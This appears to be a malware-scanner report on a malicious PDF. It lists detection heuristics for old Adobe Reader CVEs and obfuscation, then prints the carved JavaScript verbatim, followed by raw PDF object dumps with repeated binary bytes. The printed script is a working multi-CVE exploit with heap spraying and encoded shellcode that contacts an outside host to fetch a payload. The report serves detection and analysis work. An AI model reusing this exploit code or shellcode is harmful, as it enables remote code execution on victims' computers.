MALICIOUS
612
Risk Score
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 14
-
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (matched in decompressed stream)
-
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (matched in decompressed stream)
-
util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (matched in decompressed stream)
-
Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCHA single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
-
ClamAV: Heuristics.PDF.ObfuscatedNameObject critical CLAMAV_DETECTIONClamAV detected this file as malware: Heuristics.PDF.ObfuscatedNameObject
-
Hex-obfuscated scripting name object critical PDF_OBFUSCATED_NAME_OBJECTA PDF name object that drives script execution (/JavaScript or /JS) is written with #XX hex escapes to hide it from string-based scanners — e.g. /J#61v#61S#63r#69p#74 decoding to /JavaScript. Legitimate PDF producers always write these names literally; hex-encoding an executable name is a deliberate evasion used by exploit-kit and dropper PDFs.
-
Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KITOne recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
app.eval(); -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERYBounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
-
Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTALThe same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
-
PDF differential parser failed info PDF_DIFFERENTIAL_PARSE_FAILEDThe cross-check parser (pdfminer.six) failed on this file: PDF differential parser failed: PSSyntaxError. Static heuristics still ran and any of their findings above are valid; only the differential cross-check signal is missing.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 5
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0116_000.js |
pdf-javascript-stream | PDF /JS object 116 at offset 0x497 | 6294 bytes |
SHA-256: dfb5dd6f4926b31d2a70ac075cd9932548325abef1be82af243c403323a22b61 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var Xez=unescape,Fqx=app.viewerVersion.toString(),YDg=Xez("t\h\i\s");YDg=eval(YDg);if(Fqx<8)
{MXVBj();}
if(Fqx>=8&&Fqx<9)
{obk();}
if(Fqx<=9)
{pnYmx();}
function eTRTT(sAZQH,uJqqU){while(sAZQH.length*2<uJqqU){sAZQH+=sAZQH;}
return sAZQH.substring(0,uJqqU/2);}
function MXVBj(){var rcbcz=Xez("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3720\u302E\u577C\u6E69\u6F64\u7377\u5820\u5D50\u265D\u3D65\u0032\u0000\u0000\u0000\x23\x42\x23\x42\x23\x42\x23\x42");var CAAND=0x0c0c0c0c;var BmNBH=[];var Efzsp=0x400000;var AOPlD=rcbcz.length*2;var uJqqU=Efzsp-(AOPlD+0x38);var sAZQH=Xez("\u9090\u9090");sAZQH=eTRTT(sAZQH,uJqqU);var ZVpAM=(CAAND-0x400000)/Efzsp;for(var XhpXX=0;XhpXX<ZVpAM;XhpXX++){BmNBH[XhpXX]=sAZQH+rcbcz;}
var uOXiu=Xez("\u0c0c\u0c0c");while(uOXiu.length<44952)uOXiu+=uOXiu;this.collabStore=Collab.collectEmailInfo({subj:"",msg:uOXiu});}
function obk(){var ADP=new Array();function TbO(RKg,Dan){while(RKg.length*2<Dan){RKg+=RKg;}
RKg=RKg.substring(0,Dan/2);return RKg;}
hIH=0x30303030;zmP=Xez("\u4343\u4343\u4343\u0FEB\u335B\u66C9\u80B9\u8001\uEF33\uE243\uEBFA\uE805\uFFEC\uFFFF\u8B7F\uDF4E\uEFEF\u64EF\uE3AF\u9F64\u42F3\u9F64\u6EE7\uEF03\uEFEB\u64EF\uB903\u6187\uE1A1\u0703\uEF11\uEFEF\uAA66\uB9EB\u7787\u6511\u07E1\uEF1F\uEFEF\uAA66\uB9E7\uCA87\u105F\u072D\uEF0D\uEFEF\uAA66\uB9E3\u0087\u0F21\u078F\uEF3B\uEFEF\uAA66\uB9FF\u2E87\u0A96\u0757\uEF29\uEFEF\uAA66\uAFFB\uD76F\u9A2C\u6615\uF7AA\uE806\uEFEE\uB1EF\u9A66\u64CB\uEBAA\uEE85\u64B6\uF7BA\u07B9\uEF64\uEFEF\u87BF\uF5D9\u9FC0\u7807\uEFEF\u66EF\uF3AA\u2A64\u2F6C\u66BF\uCFAA\u1087\uEFEF\uBFEF\uAA64\u85FB\uB6ED\uBA64\u07F7\uEF8E\uEFEF\uAAEC\u28CF\uB3EF\uC191\u288A\uEBAF\u8A97\uEFEF\u9A10\u64CF\uE3AA\uEE85\u64B6\uF7BA\uAF07\uEFEF\u85EF\uB7E8\uAAEC\uDCCB\uBC34\u10BC\uCF9A\uBCBF\uAA64\u85F3\uB6EA\uBA64\u07F7\uEFCC\uEFEF\uEF85\u9A10\u64CF\uE7AA\uED85\u64B6\uF7BA\uFF07\uEFEF\u85EF\u6410\uFFAA\uEE85\u64B6\uF7BA\uEF07\uEFEF\uAEEF\uBDB4\u0EEC\u0EEC\u0EEC\u0EEC\u036C\uB5EB\u64BC\u0D35\uBD18\u0F10\u64BA\u6403\uE792\uB264\uB9E3\u9C64\u64D3\uF19B\uEC97\uB91C\u9964\uECCF\uDC1C\uA626\u42AE\u2CEC\uDCB9\uE019\uFF51\u1DD5\uE79B\u212E\uECE2\uAF1D\u1E04\u11D4\u9AB1\uB50A\u0464\uB564\uECCB\u8932\uE364\u64A4\uF3B5\u32EC\uEB64\uEC64\uB12A\u2DB2\uEFE7\u1B07\u1011\uBA10\uA3BD\uA0A2\uEFA1\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3720\u302E\u577C\u6E69\u6F64\u7377\u5820\u5D50\u265D\u3D65\u0031\u0000");var brl=0x400000;var thD=zmP.length*2;var Dan=brl-(thD+0x38);var RKg=Xez("\u9090\u9090");RKg=TbO(RKg,Dan);var DzR=(hIH-0x400000)/brl;for(var yMS=0;yMS<DzR;yMS++){ADP[yMS]=RKg+zmP;}
var GjC="44606420085485426596";for(Xez=0;Xez<138*2;Xez++){GjC+="2";}
util.printf("%4"+"50"+"00"+"f",GjC);}
function DIG(hjP)
{hjP=hjP.replace(/[\+1]/g,"0");hjP=hjP.replace(/[\+2]/g,"9");hjP=hjP.replace(/[\+3]/g,"8");hjP=hjP.replace(/[\+4]/g,"7");hjP=hjP.replace(/[\+5]/g,"6");hjP=hjP.replace(/[\+6]/g,"5");hjP=hjP.replace(/[\+7]/g,"4");hjP=hjP.replace(/[\+8]/g,"3");hjP=hjP.replace(/[\+9]/g,"2");hjP=hjP.replace(/[\+0]/g,"1");return hjP;}
function pnYmx(){var BeyfM=Xez("\u4343\u4343\u4343\u0FEB\u335B\u66C9\u80B9\u8001\uEF33\uE243\uEBFA\uE805\uFFEC\uFFFF\u8B7F\uDF4E\uEFEF\u64EF\uE3AF\u9F64\u42F3\u9F64\u6EE7\uEF03\uEFEB\u64EF\uB903\u6187\uE1A1\u0703\uEF11\uEFEF\uAA66\uB9EB\u7787\u6511\u07E1\uEF1F\uEFEF\uAA66\uB9E7\uCA87\u105F\u072D\uEF0D\uEFEF\uAA66\uB9E3\u0087\u0F21\u078F\uEF3B\uEFEF\uAA66\uB9FF\u2E87\u0A96\u0757\uEF29\uEFEF\uAA66\uAFFB\uD76F\u9A2C\u6615\uF7AA\uE806\uEFEE\uB1EF\u9A66\u64CB\uEBAA\uEE85\u64B6\uF7BA\u07B9\uEF64\uEFEF\u87BF\uF5D9\u9FC0\u7807\uEFEF\u66EF\uF3AA\u2A64\u2F6C\u66BF\uCFAA\u1087\uEFEF\uBFEF\uAA64\u85FB\uB6ED\uBA64\u07F7\uEF8E\uEFEF\uAAEC\u28CF\uB3EF\uC191\u288A\uEBAF\u8A97\uEFEF\u9A10\u64CF\uE3AA\uEE85\u64B6\uF7BA\uAF07\uEFEF\u85EF\uB7E8\uAAEC\uDCCB\uBC34\u10BC\uCF9A\uBCBF\uAA64\u85F3\uB6EA\uBA64\u07F7\uEFCC\uEFEF\uEF85\u9A10\u64CF\uE7AA\uED85\u64B6\uF7BA\uFF07\uEFEF\u85EF\u6410\uFFAA\uEE85\u64B6\uF7BA\uEF07\uEFEF\uAEEF\uBDB4\u0EEC\u0EEC\u0EEC\u0EEC\u036C\uB5EB\u64BC\u0D35\uBD18\u0F10\u64BA\u6403\uE792\uB264\uB9E3\u9C64\u64D3\uF19B\uEC97\uB91C\u9964\uECCF\uDC1C\uA626\u42AE\u2CEC\uDCB9\uE019\uFF51\u1DD5\uE79B\u212E\uECE2\uAF1D\u1E04\u11D4\u9AB1\uB50A\u0464\uB564\uECCB\u8932\uE364\u64A4\uF3B5\u32EC\uEB64\uEC64\uB12A\u2DB2\uEFE7\u1B07\u1011\uBA10\uA3BD\uA0A2\uEFA1\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3720\u302E\u577C\u6E69\u6F64\u7377\u5820\u5D50\u265D\u3D65\u0033\u0000\u0000");gbD=Xez("\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090")+BeyfM;nlU=Xez("\u9090\u9090");Ody=5*2;TBy=Ody+gbD.length;while(nlU.length<TBy)nlU+=nlU;ujw=nlU.substring(0,TBy);sxI=nlU.substring(0,nlU.length-TBy);while(sxI.length+TBy<0x40000)sxI=sxI+sxI+ujw;VaE=[];for(lqQ=0;lqQ<180;lqQ++)VaE[lqQ]=sxI+gbD;var zMy=4012;var cWB=Array(zMy);for(lqQ=0;lqQ<zMy;lqQ++)
{cWB[lqQ]=Xez("\u000a\u000a\u000a\u000a");}
Collab.getIcon(cWB+"_N"+".b"+"un"+"dl"+"e");}
|
|||
javascript_obj0123_002.js |
pdf-javascript-stream | PDF /JS object 123 at offset 0x36E | 7293 bytes |
SHA-256: 3a50897d930cc8ff033ed28b9b4c2975279f6958c09abaa57aae89aa5d680dd6 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
app.eval();
endstream
endobj
73 0 obj<</Subtype/XML/Length 224/Type/Metadata>>stream
©N> u «а©1XЄѕ»&Ї Єш'v/щ(шпС;с-nsd02`Б№Ђ0_5¦ћќ9%lч|Ъ|5‘•@ Ж‹эся ЄLД" –Љ “©д«9иhS/ќkSЃcш-2T†ЮсѕqИ ЊѓМwF} oN РХbљEИ iH\\ Лт
endstream
endobj
116 0 obj
<</ / / / /Filter/#46#6c#61#74#65#44#65#63#6f#64#65/Length 2000+035>>
stream
x^�X�r�8 }�W�T5S��q@� ���U L�SN2�'� +�%{��ʲ#K�/� �s��c�� �]�҂��F 8������ه�u���/�G����� ��o|> �ޏg �gӍ�ٻ��xz����� ���v�ã���� �5�<�t1�
� �p��zk7� ���no�u�e��t?�Ha ���6K�Χ �^
�`1ݟc�g㝷;;���^�/����{/GǓq�ژ�����ͥL��R>�f6�/f�g���b�]�j]�HW�Z�{ä�����ۅ ��z�p�dÅV� .Tm�p�)��W�p�� |� R�C�� �R�Ѱ�5msG+SiX�U ~H��4 ?Ԕf��y�W�T�� ���,��� [��N?Z[�Q�Q�&B� J�N1���dE]�&�p �61 >(P� x��f���X#*� 43 �D�=Wg�ȹB@<��\�2��\JV�| ��f��V�gmT ��H�\� ��X9���j� =l]Us^��*�*%e�� �-�U!b�] ~ ⱎԘ�y6 �xű� rU�� �<�``e� 1 ��4���<3�� ƠB i� ���� Ѷ� �˾ :��� �uRӛ�A���4&XQ�<-�7�����^8���1� Y��ϭ�9�� T-�; �� w-� V&�\�6� kl)���o�Bt,Wjj '� t��� j�S7 '!5�6�r�4�0/�J�s�/1X��#7 R�lu��Ө���Z� Q�L�� �����Q'o�U �6�U��
?+�2���, >� t�m���US�K���
ӟ��/�ݏ�% \_�C#� JX��7�� �� v�b�+Z}u�];�@�-p �@�� ��<�31���y�]v%��a�^�$���YW����ÇR
�sSL�q�����-��%v�� �����6.� i E\-��|���,+�'�~) ��������d2�{7?���Z�� �����x�5=8�� fO~�t�O/ ۯ+(+�/ [5o���˳j6 ] ��0 g�u������hz����
� N� ��@9Z x� ޗ ��;�z�- ������mB2��Tߣ��:���4�R��PE����!�U���Nᔶ(�b��D�& =���3�AW���� ��vlB�� �8�"m�� rL�(M*b�mu ��:Ue� ^*���49�� �I8�&tꊚ�ʉ�6�]��BW| � ͠1 �N�iV� M�:
�Y �V�H xF��kV1¶�D��J� &a�l�f ��G�|�H
Y��j��E %� O�� e�;A���� �y ~ kb�S ��! X�6�h�FV chUG� Yu��oW
M�3~o r��V�(��n���'!u5m5=�IA uDu�� Vŝ��JX�2��|w�U� ��%* ���\M�����F�<8u,���\ NH 9v ��� y
�v�X r� O�/� �<>��d\ *�w���[o $��3{Aj�C��#>o� W� ��|��>�6c�}�ɍ� ;��+�]�ͪ��e
�1)��b�}�� (���yS�S� '*K+ֲ�ͪ�+��Ƙc ��A � �҄�,� �V1�yH +u�4�E��s��IT�rFv# +Z�m� �/�V���� �6�����ԏD��3��� �rr*�1{��#�H��?�
�H�YV���d��Ϗ� @�Z�Q Jh>�Bz�v��,[���M���$ ��~[vQQ�Uk����W��P�A7��O�hT�] ?�Z� ղ6�rR��,3
�(�6���ާ0 q� 4 ���f��O)Gt �~�I;p�� O6��h3?�v~�:�N�@��~砳 ͕ �l��=:y� .� � ���d�?�� ���/ �;L����H�G�Z�� i&R��4 �yDjD�?"�"� �:��G��H�G�J� ��V I��|�|d��Ə� ��Z���⩥` zj)�Z
y�����A xn_4 � ���}A�\�D��2����� ��߿� ����т��� �>NƲ�\�F���K ���_� '_���
��˭ �oN��������u ���K� �� �2x?
|���q��74�����O�� �b�WD�G���^o_��JR��� _��d��[� G`- ��@�u��qeFrsV(���ˢ��|k�lڅe���W�N7�@ S��& cj� (�H/x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�
endstream
endobj
95 0 obj
<</ / / / /Direction/L2R/ / / />>
endobj
1990 0 obj
<</ / / / /S/#4a#61#76#61#53#63#72#69#70#74/JS 116 0 R/ / / />>
endobj
95 0 obj
<</ / / / /Direction/L2R/ / / />>
endobj
1 0 obj
<</ / / / /Typp/Action/S/#47#6f#54#6f/D[9 0 /XYZ 0 504 #31]/ / / />>
endobj
5 0 obj
<</ / / / /Typp/Action/S/#47#6f#54#6f/D[9 0 /XYZ 0 504 #31]/ / / />>
endobj
9 0 obj
<</ / / / /count 2/Type/Pages/Kids[1894 0 R]/ / / />>
endobj
123 0 obj
<</ / / / /Length 0000>>
stream
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
endstream
endobj
23 0 obj<</CropBox[0 0 595.22 842]/Parent 62 0 R/Contents 25 0 R/Rotate 0/MediaBox[0 0 595.22 842]/Resources 24 0 R/Type/Page>>
endobj
24 0 obj<</ColorSpace<</Cs6 59 0 R>>/Font<</TT2 52 0 R/TT3 54 0 R/TT4 45 0 R>>/ProcSet[/PDF/Text]/ExtGState<</GS1 57 0 R>>>>
endobj
25 0 obj[26 0 R 27 0 R 28 0 R]
endobj
26 0 obj<</Length 3>>stream
Y.в
endstream
endobj
91 0 obj
<</ / / / /S/JavaScript/JS 123 0 R/ / / />>
endobj
xref
trailer
<<
/Root 15 0 R
>>
startxrefx� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �x� # ��x�KOr�� �O� q�,�*/�� Kt��L��8 ��$�8v �
|
|||
generic_stage_recovery_000.js |
deobfuscated-js | generic stage recovery split-literal-normalize from JavaScript object 116 at offset 0x497 | 6273 bytes |
SHA-256: 8baedb7fb33e0231c19c79f9a6aa660917945c23a37b19ec8879de2442ba103f |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var Xez=unescape,Fqx=app.viewerVersion.toString(),YDg=Xez("t\h\i\s");YDg=eval(YDg);if(Fqx<8)
{MXVBj();}
if(Fqx>=8&&Fqx<9)
{obk();}
if(Fqx<=9)
{pnYmx();}
function eTRTT(sAZQH,uJqqU){while(sAZQH.length*2<uJqqU){sAZQH+=sAZQH;}
return sAZQH.substring(0,uJqqU/2);}
function MXVBj(){var rcbcz=Xez("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3720\u302E\u577C\u6E69\u6F64\u7377\u5820\u5D50\u265D\u3D65\u0032\u0000\u0000\u0000\x23\x42\x23\x42\x23\x42\x23\x42");var CAAND=0x0c0c0c0c;var BmNBH=[];var Efzsp=0x400000;var AOPlD=rcbcz.length*2;var uJqqU=Efzsp-(AOPlD+0x38);var sAZQH=Xez("\u9090\u9090");sAZQH=eTRTT(sAZQH,uJqqU);var ZVpAM=(CAAND-0x400000)/Efzsp;for(var XhpXX=0;XhpXX<ZVpAM;XhpXX++){BmNBH[XhpXX]=sAZQH+rcbcz;}
var uOXiu=Xez("\u0c0c\u0c0c");while(uOXiu.length<44952)uOXiu+=uOXiu;this.collabStore=Collab.collectEmailInfo({subj:"",msg:uOXiu});}
function obk(){var ADP=new Array();function TbO(RKg,Dan){while(RKg.length*2<Dan){RKg+=RKg;}
RKg=RKg.substring(0,Dan/2);return RKg;}
